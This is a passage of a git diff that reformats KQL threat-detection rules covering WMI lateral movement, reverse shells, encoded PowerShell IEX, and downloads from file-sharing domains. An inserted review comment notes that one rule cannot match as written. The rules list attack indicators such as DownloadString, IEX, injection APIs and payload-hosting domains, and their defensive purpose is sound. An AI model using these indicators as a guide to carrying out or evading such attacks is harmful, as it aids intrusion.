"OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or 
ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
index 6af3f015..6cc17ee5 100644
--- a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
+++ b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
@@ -1,14 +1,14 @@
-// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
-// Author: Markus Neis @Karneades
-// Date: 2019-04-03
-// Level: medium
-// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047, attack.t1059.001
-// False Positives:
-// - AppvClient
-// - CCM
-// - WinRM
-
-DeviceProcessEvents
+// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
+// Author: Markus Neis @Karneades
+// Date: 2019-04-03
+// Level: medium
+// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.t1059.001
+// False Positives:
+// - AppvClient
+// - CCM
+// - WinRM
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/Execution/potential_xterm_reverse_shell.kql
index 1c1b667c..2fd1ef34 100644
--- a/KQL/rules/Execution/potential_xterm_reverse_shell.kql
+++ b/KQL/rules/Execution/potential_xterm_reverse_shell.kql
@@ -1,10 +1,10 @@
-// Title: Potential Xterm Reverse Shell
-// Author: @d4ns4n_
-// Date: 2023-04-24
-// Level: medium
-// Description: Detects usage of "xterm" as a potential reverse shell tunnel
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Potential Xterm Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects usage of "xterm" as a potential reverse shell tunnel
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql
index 4ccb7247..a74ccf6c 100644
--- a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql
+++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Child Process Of ClickOnce Application
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process Of ClickOnce Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql
index f4afef5e..7d42e55a 100644
--- a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql
+++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Child Process Of VsCode
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-26
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
-// False Positives:
-// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process Of VsCode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+// False Positives:
+// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql
index 816df51d..ee470fcf 100644
--- a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql
+++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Child Process Of WinRAR.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-31
-// Level: medium
-// Description: Detects potentially suspicious child processes of WinRAR.exe.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Child Process Of WinRAR.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: medium
+// Description: Detects potentially suspicious child processes of WinRAR.exe.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
index 877e0a90..c557a628 100644
--- a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
+++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
@@ -1,11 +1,11 @@
-// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
-// Author: Ahmed Farouk, Nasreddine Bencherchali
-// Date: 2024-11-01
-// Level: high
-// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
-// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceRegistryEvents
+// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: high
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql
index 3ff906ba..2da6049e 100644
--- a/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql
+++ b/KQL/rules/Execution/potentially_suspicious_electron_application_commandline.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Electron Application CommandLine
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-09-05
-// Level: medium
-// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate usage for debugging purposes
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Electron Application CommandLine
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-05
+// Level: medium
+// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage for debugging purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql
index 43299eac..34615381 100644
--- a/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql
+++ b/KQL/rules/Execution/potentially_suspicious_execution_of_pdqdeployrunner.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Execution Of PDQDeployRunner
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-22
-// Level: medium
-// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
-// MITRE Tactic: Execution
-// Tags: attack.execution
-// False Positives:
-// - Legitimate use of the PDQDeploy tool to execute these commands
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Execution Of PDQDeployRunner
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-22
+// Level: medium
+// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate use of the PDQDeploy tool to execute these commands
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or 
ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
index b018e74b..a486363a 100644
--- a/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
+++ b/KQL/rules/Execution/potentially_suspicious_file_download_from_file_sharing_domain_via_powershell_exe.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-02-23
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: high
+// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "pixeldrain.com" or ProcessCommandLine contains "privatlab.com" or 
ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
index 099c6c56..78f70d80 100644
--- a/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
+++ b/KQL/rules/Execution/potentially_suspicious_inline_javascript_execution_via_nodejs_binary.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
-// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-04-21
-// Level: medium
-// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.007
-// False Positives:
-// - Legitimate scripts using Node.js with these modules
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Inline JavaScript Execution via NodeJS Binary
+// Author: Microsoft (idea), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: medium
+// Description: Detects potentially suspicious inline JavaScript execution using Node.js with specific keywords in the command line.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+// - Legitimate scripts using Node.js with these modules
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "http" and ProcessCommandLine contains "execSync" and ProcessCommandLine contains "spawn" and ProcessCommandLine contains "fs" and ProcessCommandLine contains "path" and ProcessCommandLine contains "zlib") and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql
index 5241b710..d4000a62 100644
--- a/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql
+++ b/KQL/rules/Execution/potentially_suspicious_named_pipe_created_via_mkfifo.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Named Pipe Created Via Mkfifo
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-16
-// Level: medium
-// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Named Pipe Created Via Mkfifo
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-16
+// Level: medium
+// Description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /tmp/" and FolderPath endswith "/mkfifo"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql
index de91eb39..d9e979b2 100644
--- a/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql
+++ b/KQL/rules/Execution/potentially_suspicious_webdav_lnk_execution.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious WebDAV LNK Execution
-// Author: Micah Babinski
-// Date: 2023-08-21
-// Level: medium
-// Description: Detects possible execution via LNK file accessed on a WebDAV server.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.t1204
-
-DeviceProcessEvents
+// Title: Potentially Suspicious WebDAV LNK Execution
+// Author: Micah Babinski
+// Date: 2023-08-21
+// Level: medium
+// Description: Detects possible execution via LNK file accessed on a WebDAV server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1204
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql
index c1021955..72677325 100644
--- a/KQL/rules/Execution/powershell_as_a_service_in_registry.kql
+++ b/KQL/rules/Execution/powershell_as_a_service_in_registry.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell as a Service in Registry
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020-10-06
-// Level: high
-// Description: Detects that a powershell code is written to the registry as a service.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002
-
-DeviceRegistryEvents
+// Title: PowerShell as a Service in Registry
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-06
+// Level: high
+// Description: Detects that a powershell code is written to the registry as a service.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath"
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql
index a8a14e98..5ad68d4b 100644
--- a/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql
+++ b/KQL/rules/Execution/powershell_base64_encoded_iex_cmdlet.kql
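Review bot: The where clause on the unchanged last line of this hunk can never be true: `RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath"` asks one string to end with two different suffixes, and KQL `endswith` treats `*` as a literal character, not a wildcard, so the regenerated rule is dead as written. The `*` is presumably the Sigma `\Services\*\ImagePath` pattern that the converter folded into `endswith` instead of `contains`; in Defender's DeviceRegistryEvents the value name is also carried in RegistryValueName rather than appended to RegistryKey. A working form is `| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey contains "\\Services\\" and RegistryValueName =~ "ImagePath"`. Since the commit message says these files come from a new KQL backend, the fix likely belongs in the converter's wildcard handling rather than in a hand edit of this file.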
@@ -1,10 +1,10 @@
-// Title: PowerShell Base64 Encoded IEX Cmdlet
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-08-23
-// Level: high
-// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: PowerShell Base64 Encoded IEX Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-23
+// Level: high
+// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains 
"kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA")
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql
index 41da956b..447a251d 100644
--- a/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql
+++ b/KQL/rules/Execution/powershell_base64_encoded_invoke_keyword.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Base64 Encoded Invoke Keyword
-// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
-// Date: 2022-05-20
-// Level: high
-// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: PowerShell Base64 Encoded Invoke Keyword
+// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
+// Date: 2022-05-20
+// Level: high
+// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql
index fdd6da7a..6e888d3f 100644
--- a/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql
+++ b/KQL/rules/Execution/powershell_base64_encoded_reflective_assembly_load.kql
@@ -1,12 +1,12 @@
-// Title: PowerShell Base64 Encoded Reflective Assembly Load
-// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
-// Date: 2022-03-01
-// Level: high
-// Description: Detects base64 encoded .NET reflective loading of Assembly
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, attack.t1620
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: PowerShell Base64 Encoded Reflective Assembly Load
+// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
+// Date: 2022-03-01
+// Level: high
